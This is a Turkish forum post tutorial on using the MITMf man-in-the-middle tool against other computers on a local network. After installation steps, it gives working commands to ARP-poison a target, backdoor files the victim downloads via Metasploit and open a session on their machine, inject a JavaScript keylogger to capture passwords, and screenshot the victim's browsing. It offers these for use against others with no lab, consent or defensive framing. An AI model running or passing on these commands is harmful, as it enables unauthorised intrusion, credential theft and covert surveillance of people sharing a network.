Mitmf genel kullanım Ağdaki Bilgisayarlar / BackDoor Keylooger vs (1 Viewer)

R

Rolesa

Mitmf kurulumu
Code:
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
Code:
pip install virtualenvwrapper
Code:
source /usr/bin/virtualenvwrapper.sh
Başka Bir terminale
Code:
source /usr/bin/virtualenvwrapper.sh
Code:
mkvirtualenv MITMf -p /usr/bin/python2.7
Gerekli Materyalleri kurduk manuel kurma sebebimiz tool kendisi kurarmuyor.
Code:
git clone https://github.com/byt3bl33d3r/MITMf.git
Şimdi github linkimizi clonelayalım
indirdiğimiz klasörün içerisindeki requirements.txt dosyasını kurun
Code:
pip install -r requirements.txt
Herşey bitti şuanda py uzantılı dosyamızı açabilriz.
Şimdi gelelim konularımıza
Ağdaki bilgisayarın indirdiği tüm dosyalara backdoor koyma .
Not = Httpli siteler
İlk olarak terminalimizde metasploit açalım
Code:
msfconsole

Code:
load msgrpc
Burdaki passwordu kopyalıyoruz ve yeni bir terminal açıyoruz
Code:
su -
Ben dosyayı leafpad ile aççağım siz ne ile açarsanız artık
Code:
leafpad /usr/share/mitmf/config/mitmf.conf
Açılan leafpad penceremizde metasploit adı altında passwordlar port ayarları olcak ilk terminalde
Code:
load msgrpc
yazarak aldığımız passwordu açılan leafpaddeki passwordun yerine yazarak kaydediyoruz . Eğer ben uğraşamam dersenizde
Code:
load msgrpc Pass=yenişifre
olarakda yazabilirsiniz. M
etasploitimiz arkada açıkken yeni bir terminal açıp şu komutları yazıyoruz
Code:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --filepwn
Şimdi bu kodu açalım yazdığımız komutlar ne işe yarıyormuş kendinize göre nasıl editlersiniz vs .
-i : Interface Belirtmemize Yarar (eth0, wlan0, enp2s0)
–spoof : Agı Dinlemeye Baslar.
–arp : Arp Poisoning Saldirisi Ile Trafigi Ustumuze Gecirir.
–gateway : Gateway IP Adresini Yazacagimiz Kısım
Code:
route -n
olarak öğrenebilirsiniz.
–target : Hedef IP Adresini Yazacagimiz Kısım.
evet şimdi ağ dinleniyor karşı kişi bilgisayarına indirdiği dosyaya backdoor yerleştirilcektir karşı bilgisayar dosyayı aktif hale getirdiğinde metasploitimize bilgirim gelcektir . geldikten sonra
Code:
sessions -i  1
yazarak bağlanıyoruz işte bu kadar şimdi karşı bilgisayara erişim sağladık .
Şimdi Keylogger özelliğine bakalım
–jskeylogger : Web Sayfasi Uzerinde Basilan Tus lari Algılamaya yarar.
kullancağımız komut budur isterseniz önceki komutun sonuna da ekleyip 2 faktörlü bir silaha dönüştürebilirsiniz.

Code:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --jskeylogger
yazarak bekliyoruz --spoof komutunu yazma sebebimizde hangi sitieye girdiği öğrenmek. Yani keylogger sayesinde aldığımız şifrenin hangi siteye ait olduğunu öğrenmek.
Şimdide karşı kişinin girdiği sayfanın jpg halini almak yani screen görüntü almamızı sağlıyacak komutumuz olan
Code:
--screen
kullanalım .


Code:
python mitmf.py -i wlan0 --arp --spoof --gateway 192.168.177.2 --target 192.168.177.33 --screen
karşı kişi hangi sayfaya girerse
Code:
/var/log/mitmf
klasörüne kaydedilcektir.
Kullanımı kolay bir tooldur normalde bunları manuel olarak anlatcaktım ama aklıma mitmf geldi ne uğraşıyorum direk tool anlatımı yapayım dedim bende
 

Users who are viewing this thread

Top